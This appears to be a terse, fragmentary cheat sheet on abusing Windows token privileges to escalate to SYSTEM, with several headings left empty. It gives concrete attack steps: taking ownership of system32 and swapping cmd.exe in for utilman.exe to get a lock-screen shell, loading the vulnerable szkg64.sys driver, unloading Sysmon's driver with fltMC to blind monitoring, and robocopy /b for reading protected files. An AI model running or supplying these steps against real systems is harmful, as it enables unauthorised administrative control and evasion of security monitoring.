SeAssignPrimaryToken

SeBackup
    robocopy /b
    SeBackupPrivilege (and robocopy) is not helpful when it comes to open files.
    - Robocopy requires both SeBackup and SeRestore to work with the /b parameter.

SeCreateToken
    NtCreateToken

SeLoadDriver
    szkg64.sys
    2. Exploit the driver vulnerability
    Alternatively, the privilege may be used to unload security-related drivers with the fltMC built-in command, i.e.: fltMC sysmondrv
    - The szkg64 vulnerability is listed as CVE-2018-15732.
    2. The szkg64 exploit code was created by Parvez Anwar.

SeRestore

SeTakeOwnership
    1. takeown.exe /f "%windir%\system32"
    2. icacls.exe "%windir%\system32" /grant "%username%":F
    3. Rename cmd.exe to utilman.exe
    4. Lock the console and press Win+U

SeTcb